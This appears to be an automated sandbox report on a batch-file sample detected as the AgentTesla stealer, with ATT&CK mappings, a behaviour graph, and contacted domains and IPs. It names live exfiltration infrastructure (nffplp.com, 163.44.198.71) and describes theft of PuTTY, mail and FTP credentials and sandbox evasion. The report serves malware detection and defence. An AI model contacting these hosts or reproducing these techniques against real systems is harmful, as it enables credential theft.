                    Source: Yara matchFile source: 00000008.00000002.1517390065.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7176, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7684, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information112
                    Scripting                    		Valid Accounts121
                    Windows Management Instrumentation                    		112
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		2
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		421
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545586 Sample: ilZhNx3JAc.bat Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 48 nffplp.com 2->48 50 ip-api.com 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Yara detected AgentTesla 2->60 62 13 other signatures 2->62 9 cmd.exe 1 2->9         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 72 Uses cmd line tools excessively to alter registry or file data 9->72 14 ilZhNx3JAc.bat.Dmf 17 9->14         started        18 xcopy.exe 2 9->18         started        20 conhost.exe 9->20         started        24 3 other processes 9->24 74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->74 22 cmd.exe 1 12->22         started        process6 file7 44 C:\Users\user\AppData\...\MustFlush.vbs, ASCII 14->44 dropped 90 Drops VBS files to the startup folder 14->90 92 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->92 94 Writes to foreign memory regions 14->94 98 4 other signatures 14->98 26 InstallUtil.exe 15 2 14->26         started        46 C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, PE32 18->46 dropped 96 Uses cmd line tools excessively to alter registry or file data 22->96 30 MustFlush.bat.Dmf 15 22->30         started        32 xcopy.exe 2 22->32         started        35 conhost.exe 22->35         started        37 3 other processes 22->37 signatures8 process9 dnsIp10 52 ip-api.com 208.95.112.1, 49724, 49802, 80 TUT-ASUS United States 26->52 54 nffplp.com 163.44.198.71, 49740, 49815, 587 GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG Singapore 26->54 76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 26->76 78 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->78 80 Tries to steal Mail credentials (via file / registry access) 26->80 82 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 26->82 84 Powershell is started from unusual location (likely to bypass HIPS) 30->84 86 Reads the Security eventlog 30->86 88 Reads the System eventlog 30->88 39 InstallUtil.exe 30->39         started        42 C:\Users\user\AppData\...\MustFlush.bat.Dmf, PE32 32->42 dropped file11 signatures12 process13 signatures14 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 39->64 66 Tries to steal Mail credentials (via file / registry access) 39->66 68 Tries to harvest and steal ftp login credentials 39->68 70 2 other signatures 39->70

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    ilZhNx3JAc.bat5%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf0%ReversingLabs
                    C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://www.microsoft.0%URL Reputationsafe
                    http://crl.micro0%URL Reputationsafe
                    https://aka.ms/pscore6lB0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown
                        nffplp.com
                        		163.44.198.71
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://nffplp.comInstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://nuget.org/NuGet.exeilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://stackoverflow.com/q/14436606/23354ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://account.dyn.com/ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/mgravell/protobuf-netJilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://ocsp.sectigo.com0InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngMustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlMustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/LicenseMustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/IconMustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://github.com/mgravell/protobuf-netilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.microsoft.MustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ip-api.com/line/?fields=hosting-InstallUtil.exe, 00000012.00000002.3802503434.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://github.com/Pester/PesterMustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/mgravell/protobuf-netiilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://crl.microMustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D10000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ip-api.com/line/?fields=hosting1InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://aka.ms/pscore6lBilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://stackoverflow.com/q/11564914/23354;ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://stackoverflow.com/q/2152978/23354ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://contoso.com/MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exeilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://ip-api.comInstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                208.95.112.1
                                                		ip-api.comUnited States
                                                		53334TUT-ASUStrue
                                                163.44.198.71
                                                		nffplp.comSingapore
                                                		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1545586
                                                Start date and time:2024-10-30 17:40:13 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 11m 4s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:24
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:ilZhNx3JAc.bat
                                                renamed because original name is a hash value
                                                Original Sample Name:45a4bc99c532b7f256e58501fe36a809d3bcd530fe6543de7de77d0db7902c98.bat
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winBAT@31/9@4/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 474
                                                • Number of non-executed functions: 41
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • VT rate limit hit for: ilZhNx3JAc.bat

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                12:41:20API Interceptor13x Sleep call for process: ilZhNx3JAc.bat.Dmf modified
                                                12:41:23API Interceptor9309443x Sleep call for process: InstallUtil.exe modified
                                                12:41:35API Interceptor12x Sleep call for process: MustFlush.bat.Dmf modified
                                                17:41:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                208.95.112.1wKj1CBkbos.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                • ip-api.com/line/?fields=hosting
                                                skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                                • ip-api.com/line/?fields=hosting
                                                FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                • ip-api.com/line/?fields=hosting
                                                file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                • ip-api.com/line?fields=query,country
                                                Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                                • ip-api.com/json/
                                                sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Transferencia.docGet hashmaliciousQuasarBrowse
                                                • ip-api.com/json/
                                                SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                • ip-api.com/json
                                                163.44.198.71nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                    Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                                        SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                                          US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                                            SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                                              SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  nffplp.comnDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  Payment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 163.44.198.71
                                                                  Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 163.44.198.71
                                                                  s-part-0017.t-0009.t-msedge.netphish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.246.45
                                                                  https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 13.107.246.45
                                                                  https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9Get hashmaliciousUnknownBrowse
                                                                  • 13.107.246.45
                                                                  Derickdermatology.htmlGet hashmaliciousPhisherBrowse
                                                                  • 13.107.246.45
                                                                  https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                                                                  • 13.107.246.45
                                                                  https://myworkspacec1d73.myclickfunnels.com/onlinereview--9cb35?preview=trueGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                  • 13.107.246.45
                                                                  Receipt.htmGet hashmaliciousUnknownBrowse
                                                                  • 13.107.246.45
                                                                  weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                  • 13.107.246.45
                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                  • 13.107.246.45
                                                                  https://www.guidedtrack.com/programs/n5snx1a/runGet hashmaliciousUnknownBrowse
                                                                  • 13.107.246.45
                                                                  ip-api.comwKj1CBkbos.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                  • 208.95.112.1
                                                                  skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                                                  • 208.95.112.1
                                                                  FixTsDfhiC.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                  • 208.95.112.1
                                                                  file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                  • 208.95.112.1
                                                                  Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                                                  • 208.95.112.1
                                                                  sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 208.95.112.1
                                                                  Transferencia.docGet hashmaliciousQuasarBrowse
